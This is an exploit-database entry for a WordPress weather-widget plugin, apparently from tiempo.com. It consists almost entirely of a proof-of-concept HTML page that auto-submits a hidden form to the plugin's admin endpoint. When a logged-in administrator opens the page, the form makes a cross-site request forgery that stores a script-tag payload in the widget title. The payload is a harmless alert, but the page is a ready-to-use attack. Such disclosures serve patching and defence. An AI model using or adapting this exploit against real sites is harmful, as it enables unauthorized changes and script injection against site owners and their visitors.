Share
## https://sploitus.com/exploit?id=WPEX-ID:0E677DF9-2C49-42F0-A8E2-DBCF85BFC1A2
Make a logged in admin open a page with the code below
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" method="POST">
<input type="hidden" name="page" value="tiempocom/app/admin.php" />
<input type="hidden" name="title" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="language" value="en" />
<input type="hidden" name="continent" value="8" />
<input type="hidden" name="country" value="208" />
<input type="hidden" name="location" value="12325" />
<input type="hidden" name="location_label" value="Base Amundsen-Scott del Polo Sur" />
<input type="hidden" name="location_link" value="https://www.tiempo.com/base-amundsen-scott-del-polo-sur.htm" />
<input type="hidden" name="province_type" value="4" />
<input type="hidden" name="time" value="5" />
<input type="hidden" name="format" value="1" />
<input type="hidden" name="temperature_format" value="0" />
<input type="hidden" name="wind_format" value="0" />
<input type="hidden" name="rain_format" value="0" />
<input type="hidden" name="style" value="1" />
<input type="hidden" name="marquee" value="#000000" />
<input type="hidden" name="background" value="#FFFFFF" />
<input type="hidden" name="text" value="#808080" />
<input type="hidden" name="max" value="#FF0000" />
<input type="hidden" name="min" value="#0000FF" />
<input type="hidden" name="font" value="1" />
<input type="hidden" name="save" value="Save" />
<input type="hidden" name="action" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="action2" value="-1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>